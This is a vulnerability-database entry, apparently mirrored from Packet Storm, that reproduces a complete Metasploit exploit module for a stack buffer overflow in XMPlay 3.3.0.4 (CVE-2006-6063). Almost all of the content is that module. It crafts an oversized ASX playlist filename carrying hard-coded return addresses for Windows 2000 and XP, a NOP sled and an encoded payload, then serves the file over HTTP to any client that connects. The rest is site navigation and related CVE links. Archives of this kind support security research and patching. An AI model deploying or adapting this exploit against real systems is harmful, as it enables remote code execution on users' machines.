Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83116
HistoryNov 26, 2009 - 12:00 a.m.

XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
17

0.932 High

EPSS

Percentile

99.1%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in XMPlay 3.3.0.4.   
The vulnerability is caused due to a boundary error within   
the parsing of playlists containing an overly long file name.  
This module uses the ASX file format.   
},  
'License' => MSF_LICENSE,  
'Author' => 'MC',   
'Version' => '$Revision$',  
'References' =>   
[   
[ 'CVE', '2006-6063'],  
[ 'OSVDB', '30537'],  
[ 'BID', '21206'],  
[ 'URL', 'http://secunia.com/advisories/22999/' ],  
],  
  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 750,  
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",  
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ],  
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Nov 21 2006',  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
drv = rand_text_alpha_upper(1)  
ext = rand_text_alpha_upper(3)  
  
sploit = rand_text_alpha_upper(498) + [ target.ret ].pack('V')   
sploit << make_nops(40) + payload.encoded  
  
# Build the stream format   
content = "<ASX VERSION=\"3\">\r\n" + "<ENTRY>\r\n"   
content << "<REF HREF=\"file://#{drv}:\\" + sploit  
content << "." + "#{ext}\"\r\n" + "</ENTRY>\r\n" + "</ASX>\r\n"  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
`

Related

checkpoint_advisories 1
cve 1
nvd 1
cvelist 1
checkpoint_advisories
checkpoint_advisories
Un4seen XMPlay Playlist File Name Buffer Overflow (CVE-2006-6063)
2011-11-15 00:00:00
cve
cve
CVE-2006-6063
2006-11-22 02:07:00
nvd
nvd
CVE-2006-6063
2006-11-22 02:07:00
cvelist
cvelist
CVE-2006-6063
2006-11-22 02:00:00

0.932 High

EPSS

Percentile

99.1%

JSON
Related for PACKETSTORM:83116
checkpoint_advisories1cve1nvd1cvelist1